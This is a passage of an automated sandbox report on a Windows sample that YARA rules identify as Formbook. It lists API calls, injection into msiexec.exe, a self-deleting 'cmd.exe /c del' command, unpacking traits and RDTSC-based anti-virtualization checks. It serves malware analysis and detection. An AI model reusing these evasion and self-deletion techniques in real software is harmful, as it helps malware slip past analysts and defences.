          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39760 NtOpenProcess,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A39770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3A770 NtOpenThread,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_0041826B NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B8270 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B82F0 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B826B NtReadFile,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B829
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00408C5B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00408C60
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00402D8B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041C739
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC20A8
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B090
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC28EC
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1002
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FF900
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC22AE
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2EBB0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABDBD2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC2B28
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0841F
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABD466
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22581
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0D5E0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC25DD
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC2D07
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F0D20
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC1D55
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC2EF7
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A16E30
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC1FF1
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_0041B829
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_00401030
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04651D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04652D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04580D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046525DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04652EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04651FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046528EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046520A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046522AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04652B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB829
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BC739
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A2FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A2D8B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A2D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A8C5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A8C60
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: String function: 009FB150 appears 35 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0458B150 appears 35 times
          Source: RCS76393.exe, 00000003.00000002.363023409.0000000000D8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs RCS76393.exe
          Source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RCS76393.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: RCS76393.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: RCS76393.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@12/8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
          Source: RCS76393.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RCS76393.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknownProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Users\user\Desktop\RCS76393.exeProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RCS76393.exeProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: Binary string: msiexec.pdb source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RCS76393.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\RCS76393.exeUnpacked PE file: 3.2.RCS76393.exe.400000.0.unpack .text:ER;.data:W;.jidiy:W;.wahe:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;
          Source: RCS76393.exeStatic PE information: section name: .jidiy
          Source: RCS76393.exeStatic PE information: section name: .wahe
          Source: RCS76393.exeStatic PE information: section name: .new
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00416257 push ebx; retf
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004072E3 push esp; retf
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00415FDB push es; iretd
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00415F86 push ds; retf
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A4D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_00416257 push ebx; retf
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004072E3 push esp; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B6257 push ebx; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A72E3 push esp; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B5F86 push ds; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B5FDB push es; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB40B push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB402 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB46C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.49545295007
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\RCS76393.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exe RDTSC instruction interceptor: First address: 00000000030A85E4 second address: 00000000030A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exe RDTSC instruction interceptor: First address: 00000000030A897E second address: 00000000030A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 3_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6280 Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7148 Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
          Source: explorer.exe, 00000005.00000000.345500910.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.345328681.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.346305900.0000000008540000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.340676786.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.345328681.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.340676786.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
